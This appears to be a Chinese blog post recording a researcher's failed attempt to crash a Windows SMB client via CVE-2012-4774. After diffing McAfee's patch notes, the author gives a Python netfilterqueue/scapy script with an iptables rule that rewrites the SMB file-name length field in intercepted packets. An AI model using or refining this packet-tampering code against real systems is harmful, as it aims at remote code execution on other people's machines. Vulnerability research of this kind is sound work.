作者试图利用CVE-2012-4774漏洞进行数据包攻击,但未能成功崩溃目标。通过分析Mcafee发布的修复补丁,作者尝试编写代码来触发此漏洞,并最终发现攻击未能实现预期效果。
想让CVE-2012-4774崩溃下,然后继续调试崩溃,结果他丫就是不崩
看了下,http://www.mcafee.com/us/resources/release-notes/foundstone/fsl_12_12_2012.pdf
mcafee说CVE-2012-4774
The flaw lies in the parsing of file names. Successful exploitation could allow an attacker to execute remote code. The exploit
requires the user to browse a file system containing malicious files.
补丁对比下,FindNextFileW存在问题
新的补丁处增加了mov eax,206h,对SMB的File Name Len字段进行了判断,大致知道情况
尝试为这个漏洞写了个修改数据包攻击的代码(samba目录下有个123命名的文件):
'''
please increase this in iptables
iptables -I OUTPUT -d 192.168.0.0/24 -j NFQUEUE --queue-num 1
'''
from netfilterqueue import NetfilterQueue
from scapy.all import *
__vis_filter = """................................ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[.]^_`abcdefghijklmnopqrstuvwxyz{|}~..........
......................................................................................................................."""
def hexdump(buf, length=16):
"""Return a hexdump output string of the given buffer."""
n = 0
res = []
while buf:
line, buf = buf[:length], buf[length:]
hexa = ' '.join(['%02x' % ord(x) for x in line])
line = line.translate(__vis_filter)
res.append(' %04d: %-*s %s' % (n, length * 3, hexa, line))
n += length
return '\n'.join(res)
#return hexa
def print_and_accept(pkt):
data = hexdump(pkt.get_payload())
print data
pkt.accept()
def process(payload):
data = payload.get_payload()
if data.find('\x06\x00\x00\x00') != -1 and len(data) == 408:
data2 = data.replace(data[-40:-36],'\x58\x02\x00\x00')
pkt = IP(data2)
print hexdump(str(pkt))
send(pkt,verbose=0)
payload.drop()
else:
payload.accept()
#payload.accept()
def main():
nfqueue = NetfilterQueue()
nfqueue.bind(1, process)
try:
nfqueue.run()
except KeyboardInterrupt:
print "now exist"
if __name__ == "__main__":
main()
结果杯具,没能成功崩溃,唉,继续探索
扫一扫
696
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
